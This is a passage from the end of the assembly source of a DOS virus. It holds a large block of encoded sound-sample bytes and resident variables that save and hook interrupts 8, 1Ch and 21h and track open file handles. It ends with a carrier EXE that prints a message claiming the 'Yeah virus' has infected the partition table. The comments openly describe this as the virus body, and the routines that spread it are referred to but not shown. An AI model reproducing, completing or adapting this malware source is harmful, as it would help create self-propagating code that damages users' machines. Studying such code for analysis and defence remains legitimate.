027h,072h,010h,013h,0bbh,098h,00dh,0dch,084h,002h,077h,062h,001h,0bbh,0b0h,080h db 04eh,0ech,040h,01bh,0bbh,010h,006h,0eeh,042h,000h,09dh,0d8h,080h,013h,0bbh,000h db 002h,077h,062h,004h,06eh,0e4h,020h,00ch,0eeh,0c0h,000h,0cch,0ech,000h,00ch,0eeh db 0c0h,000h,06eh,0f4h,000h,006h,077h,040h,002h,033h,0feh,080h,018h,0dfh,0f0h,000h db 046h,07fh,0c0h,023h,01bh,0f6h,000h,00ch,0ffh,0d8h,010h,031h,07eh,070h,03ch,00fh db 0e0h,0f8h,01fh,081h,0f0h,03eh,007h,0c0h,0f0h,03eh,003h,003h,0f0h,038h,03fh,003h db 081h,0f0h,03ch,01fh,081h,0c1h,0f0h,01ch,00fh,081h,0e0h,0f8h,01eh,00fh,080h,0e0h db 07fh,07fh,0ffh,0ffh,0ffh,0ffh,0ffh,0feh,06ch,092h,0d9h,0a6h,0c6h,082h,0c8h,032h db 049h,000h,083h,07fh,0b0h,000h,016h,0ffh,0a0h,000h,05fh,0fdh,080h,042h,0bfh,0f0h db 082h,009h,02dh,010h,080h,099h,06bh,040h,006h,0cah,0a0h,000h,0bdh,0b4h,000h,050h db 0b4h,001h,0d1h,0a4h,081h,0d3h,046h,096h,0d6h,0a2h,049h,0dbh,040h,0b7h,0f4h,083h db 06dh,0e9h,026h,0f1h,0f2h,027h,0f3h,0a4h,0b7h,063h,060h,01fh,0c7h,0f1h,036h,0cfh db 0b0h,03eh,00dh,0b0h,07eh,00bh,0d0h,07bh,01bh,0c0h,07ch,01bh,064h,06ch,01fh,024h db 064h,00dh,036h,066h,04dh,093h,023h,06dh,01bh,003h,02dh,09dh,007h,085h,09dh,087h db 0c4h,08eh,087h,0c4h,0c6h,0c3h,0c4h,0c7h,043h,066h,043h,003h,0e6h,043h,081h,0b2h db 065h,081h,0b2h,061h,081h,0b3h,063h,081h,0d3h,033h,0c1h,0f1h,031h,091h,0b1h,033h db 0b1h,0f1h,033h,0a1h,0e1h,023h,021h,0e1h,023h,063h,063h,066h,066h,0e3h,066h,0e4h db 0c7h,04dh,0cdh,08fh,013h,05bh,09eh,066h,064h,0ech,0cch,0c9h,0ddh,099h,091h,0bbh db 017h,04fh,0d8h,02eh,00fh,032h,07eh,01eh,068h,0f8h,079h,091h,0f0h,0f7h,046h,0c5h db 0deh,09fh,09fh,0edh,07ch,02fh,0b3h,034h,05eh,04ch,099h,0b9h,0bbh,032h,0cah,0cch db 0dbh,009h,013h,00dh,034h,02eh,064h,0d8h,0b9h,0a1h,023h,064h,08ch,08dh,092h,032h db 03ch,0c8h,0c8h,0fah,037h,023h,0d0h,09ch,00eh,0c2h,0f0h,066h,04bh,0c1h,0d9h,01bh db 026h,064h,0cch,09bh,007h,033h,06ch,01ch,099h,0e0h,072h,065h,083h,089h,01dh,00eh db 024h,064h,078h,0b1h,091h,0e6h,0cch,08fh,012h,032h,038h,049h,090h,0f3h,066h,047h db 
08dh,019h,01eh,034h,04ch,0d9h,0b3h,033h,0e6h,0cch,0c9h,019h,062h,06ch,06dh,099h db 0b1h,0b6h,066h,0c6h,0f8h,09bh,01dh,0c8h,0fch,033h,033h,0b1h,0ech,0cdh,0cdh,099h db 03ah,037h,064h,0e8h,0e7h,083h,0c1h,0cfh,007h,087h,0ddh,01fh,00fh,032h,03eh,01eh db 074h,07ch,07ch,0e0h,0f8h,0f9h,0c1h,0f9h,077h,043h,0e9h,0fbh,083h,0e0h,0e5h,087h db 082h,099h,00fh,016h,073h,023h,001h,0f1h,013h,002h,032h,006h,002h,0f2h,066h,0c0h db 0e2h,062h,046h,066h,00eh,00ch,0e6h,026h,040h,0e4h,07ch,000h,0e2h,06ch,001h,0c2h db 022h,062h,0e6h,00ch,040h,036h,01eh,002h,0e2h,036h,020h,0f2h,03ch,038h,0f3h,036h db 060h,0d3h,013h,042h,07bh,01bh,001h,0f9h,03fh,02ch,0f9h,01bh,0b0h,079h,091h,0b1h db 0f9h,01fh,083h,0f9h,09fh,003h,0fdh,09dh,09bh,0bch,0ddh,0dbh,0fch,0ddh,09bh,0fch db 0ech,069h,0fch,0dch,0fdh,09ch,0cch,0f9h,03eh,06ch,0bch,0bch,02eh,024h,0feh,066h db 034h,0deh,026h,036h,01eh,066h,066h,04eh,066h,02eh,04fh,017h,01fh,027h,033h,01fh db 00fh,09bh,01ah,04fh,099h,039h,027h,088h,0d8h,037h,098h,083h,007h,0cch,018h,012h db 04ch,01ch,006h,0a4h,036h,00eh,054h,01eh,01fh,01eh,00eh,007h,09eh,00eh,04eh,0ceh db 00fh,007h,087h,007h,087h,08fh,007h,003h,047h,007h,083h,0c3h,003h,083h,0e3h,081h db 081h,0c3h,0a3h,0e1h,0e3h,0c1h,0f1h,0f1h,0c0h,0e0h,0f9h,0c0h,0f0h,070h,0f0h,0f8h db 0f8h,0f0h,0f8h,07ch,0c0h,0d8h,018h,01ch,01ch,06ch,0fch,03fh,025h,0cch,04ch,00ch db 0ceh,06eh,03ch,0e2h,0e3h,0e3h,0e7h,0c7h,08ch,073h,032h,074h,0f0h,0f1h,0b2h,070h db 0f2h,078h,078h,078h,078h,078h,078h,038h,038h,03ch,03eh,01ch,03ch,01eh,01ch,01ch db 01eh,01fh,01eh,00fh,00eh,00eh,00fh,08fh,00fh,007h,087h,087h,043h,083h,0c3h,0c3h db 0c3h,0c3h,0c3h,0c3h,0c3h,0c1h,0e1h,0c3h,0e0h,0f0h,0e0h,0e0h,0f0h,0f0h,0e0h,0f0h db 070h,0f0h,0f8h,078h,070h,078h,070h,070h,03ch,03ch,038h,03ch,03ch,01ch,03ch,03ch db 01ch,01eh,01ch,09ch,01eh,01ch,01eh,01fh,01ch,00eh,01fh,01ch,00fh,01fh,01eh,00fh db 00fh,09fh,007h,00fh,0c7h,007h,00fh,087h,017h,087h,087h,087h,0c7h,093h,087h,0c3h db 0d3h,083h,0c3h,0d1h,0c3h,0e1h,0f9h,0c3h,0e1h,0e8h,0c7h,0e0h,0f8h,0e3h,0f8h,0f6h db 
0e3h,0e8h,07eh,0e3h,0e8h,07eh,063h,0e4h,0f9h,0e3h,0e2h,0dbh,0e1h,0e1h,0c8h,0e0h db 070h,0cdh,0f0h,0f0h,0cch,0f1h,0f8h,0c1h,0f0h,0f0h,0f1h,038h,038h,073h,038h,03ch db 073h,038h,03ch,038h,01ch,01eh,03ah,01eh,01eh,03ch,08eh,01eh,01ch,08eh,00fh,01fh db 08eh,00fh,01fh,00eh,00fh,01eh,006h,007h,00eh,007h,04eh,049h,0e2h,036h,00dh,0e6h db 028h,0c1h,0f3h,006h,004h,0b3h,007h,001h,0a9h,00fh,083h,095h,007h,087h,0c7h,083h db 081h,0e7h,083h,093h,0b3h,083h,0c1h,0e1h,0c1h,0e1h,0e3h,0c1h,0c0h,0d1h,0c1h,0e0h db 0f0h,0c0h,0e0h,0f8h,0e0h,060h,070h,0e8h,0f8h,078h,0f0h,07ch,07ch,070h,038h,03eh db 070h,03ch,01ch,03ch,03eh,03eh,03ch,03eh,01fh,030h,036h,006h,007h,007h,01bh,03fh db 00fh,0c9h,073h,013h,003h,0b3h,09bh,08fh,038h,0bch,0f8h,0f9h,0f1h,0e3h,01ch,0cch db 09dh,03ch,03ch,06ch,09ch,03ch,09eh,01eh,01eh,01eh,01eh,01eh,00eh,00eh,00fh,00fh db 087h,00fh,007h,087h,007h,007h,087h,0c7h,083h,0c3h,083h,083h,0e3h,0c3h,0c1h,0e1h db 0f1h,0d1h,0e0h,0f0h,0f0h,0f0h,0f0h,0f0h,0f0h,0f0h,0f0h,078h,070h,0f8h,03ch,038h db 038h,03ch,03ch,038h,03ch,01ch,03ch,03eh,01eh,01ch,03eh,01ch,01ch,00fh,00fh,00eh db 00fh,00fh,007h,00fh,00fh,007h,007h,087h,027h,007h,087h,007h,087h,0c7h,003h,087h db 0c7h,003h,0c7h,0c7h,083h,0c3h,0e7h,0c1h,0c3h,0f1h,0c1h,0c3h,0e1h,0c5h,0e1h,0e1h db 0e1h,0f1h,0ech,0e1h,0f0h,0f4h,0e0h,0f0h,0f4h,070h,0f8h,07eh,070h,0f8h,07ah,031h db 0f8h,03eh,038h,0feh,03dh,0b8h,0fah,01fh,0b8h,0fah,01fh,098h,0f9h,03eh,078h,0f8h db 0b6h,0f8h,0f8h,072h,038h,01ch,033h,07ch,03ch,033h,03ch,07eh,038h,07ch,03eh,03ch db 04eh,00eh,01ch,0ceh,00fh,01ch,0ceh,00fh,00eh,007h,007h,08eh,087h,087h,08fh,063h db 087h,087h,023h,083h,0c7h,0e3h,083h,0c7h,0c3h,083h,0c7h,081h,081h,0c0h,0f9h,09bh db 093h,079h,08dh,083h,079h,08bh,030h,07ch,0c9h,0c3h,02ch,0c1h,0c0h,07ah,043h,0e0h db 0e5h,041h,0e1h,0f1h,0e0h,0e0h,0f9h,0e0h,0e4h,0ech,0e0h,0f0h,078h,070h,078h,078h db 0f0h,070h,034h,070h,078h,03ch,030h,038h,03eh ; ,038h SampleEnd equ this byte ;------------------------------------------------------------------------------ ; ; Variables ; 
;------------------------------------------------------------------------------
;
; Resident state.  All values start as -1 and are initialised at run time by
; StartUp / Interrupt1C / DosVersion earlier in the listing.
;

Active          db      -1                      ; set to -1 when Interrupt1C
                                                ; installs the int 21h hook;
                                                ; cleared by DosVersion after
                                                ; the sample has been played
ActiveYear      dw      -1                      ; CX/DX from DOS "get date"
ActiveDate      dw      -1                      ; (AH=2Ah) with 3 added to the
                                                ; month, stored by the
                                                ; file-created path in Open

OldInt8         equ     this dword              ; original interrupt 8
OldInt8o        dw      -1                      ;   offset
OldInt8s        dw      -1                      ;   segment
OldInt1C        equ     this dword              ; original interrupt 1ch
OldInt1Co       dw      -1                      ;   offset
OldInt1Cs       dw      -1                      ;   segment
OldInt21        equ     this dword              ; original interrupt 21h
OldInt21o       dw      -1                      ;   offset
OldInt21s       dw      -1                      ;   segment

Count           dw      -1                      ; timer count: reloaded with
                                                ; 182 whenever Interrupt1C sees
                                                ; the int 21h vector change,
                                                ; decremented on other ticks

SampleOffset    dw      -1                      ; Used to make sound: offset of
                                                ; the current SampleData byte
SampleBit       db      -1                      ; bit counter within that byte
SampleFlag      db      -1                      ; incremented by Interrupt8
                                                ; when the sample has ended

Handle          dw      8 dup(-1)               ; File handles tracked by the
                                                ; int 21h hook; 0 = free slot
                                                ; (see HandleFree/FindHandle)

cseg            ends

;------------------------------------------------------------------------------
;
; Original EXE-file
;
; Host program carried behind the virus body in this build.  Its only visible
; behaviour is to print the Warning string (int 21h, AH=09h) and terminate
; (int 21h, AX=4C00h).  The words in front of the code form its own MZ header.
;
;------------------------------------------------------------------------------

mseg            segment public 'code'
                assume  cs:mseg, ds:mseg, es:mseg

                db      'MZ'                    ; header
                dw      PrgSize                 ; PartPage
                dw      1                       ; PageCount
                dw      0                       ; relocation items = 0
                dw      0                       ; headersize = 0h
                dw      80h                     ; minimum memory
                dw      0ffffh                  ; maximum memory
                dw      (PrgSize+15)/10h        ; ss
                dw      7feh                    ; sp
                dw      0                       ; chksum
                dw      offset Orginal          ; ip
                dw      0                       ; cs
                dw      1ch                     ; offset relocation table
                dw      0                       ; overlay number

Orginal:        mov     ah,9                    ; display warning
                push    cs
                pop     ds                      ; ds = cs, string is in mseg
                mov     dx,offset Warning
                int     21h
                mov     ax,4c00h
                int     21h                     ; terminate

Warning         db      13,10
                db      'WARNING:',13,10
                db      13,10
                db      'Yeah virus has now infected the partition table !!!!!',13,10
                db      13,10
                db      '$'                     ; terminator for AH=09h output

mseg            ends

sseg            segment stack 'stack'
                db      800h dup(?)
sseg            ends

                end     Main